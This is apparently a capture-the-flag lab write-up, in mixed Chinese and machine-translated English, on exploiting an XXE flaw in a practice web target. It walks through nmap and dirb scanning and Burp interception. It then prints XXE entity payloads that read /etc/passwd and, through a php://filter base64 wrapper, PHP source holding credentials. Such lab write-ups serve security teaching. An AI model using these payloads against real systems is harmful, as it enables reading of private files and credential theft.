前言

Apache2 Ubuntu Default Page 是一个包含xxe漏洞的页面,How to find and exploitxxe漏洞,并找到flag呢？

一、nmap扫描

首先进行信息收集,nmapis our common tool
靶机地址10.40.2.116 ,可正常访问
在kaliScan the target machine's open ports and other information
Observable only80端口开放,没有利用价值
再用dirbScans target hidden files
dirb http://10.40.2.116 /usr/share/wordlists/dirb/big.txt -X .php,.txt
It was found that there is one in the scanned directoryrobots.txt文件
登录查看
有信息
Found that there are files in the directory

二、Use the information obtained

It can be seen abovexxe文件和admin.php
查看一下
是一个登陆界面
/xxe/admin.php也是一个登陆界面
我们利用/xxe登录界面bpCapture the package to see if you can find it

Discover data withpost方式提交,and at the bottom there isxxe代码
发送到repeater提交试试
这里注意到ad有回显
那么如果将adpoint to other files,Most likely it is herexxe漏洞

三、XXE漏洞利用

我们构造xxe语句将ad指向/etc/passwd文件,看是否有回显

<!DOCTYPE test[
<!ENTITY ad SYSTEM "file:///etc/passwd">
]>

You can see the contents of the displayed file,说明存在xxe漏洞
Then go ahead and view the homepage file
apacheWhen the default path of the home page file/var/www/html/

<!DOCTYPE test[
<!ENTITY ad SYSTEM "file:///var/www/html/xxe/index.php">
]>

Can't find it to read
可以改用php伪协议读取

<!DOCTYPE test[
<!ENTITY ad SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/index.php">
]>

再通过decoder解密
The homepage file is obtained but the content inside is not available
但是还有一个文件/xxe/admin.phpWe didn't check
Check it out the same way

<!DOCTYPE test[
<!ENTITY ad SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/admin.php">
]>

base64Key information is obtained after decryption
可以看到用户名和MD5加密的密码,以及flag
密码解密后为 [email protected]
输入用户名密码
成功登录,但是点击flag,提示flag不在这儿
看看是否在xxe目录下
View the source code of the page to get itflag

总结

The above is an infiltration process of the shooting range,The general idea is to solve the problem
1.nmap,dirb信息收集
2.bpThe packet capture query can exploit the vulnerability
3.Exploiting known vulnerabilities to view critical file information
4.Simple code audit acquisitionflag
希望对大家有帮助.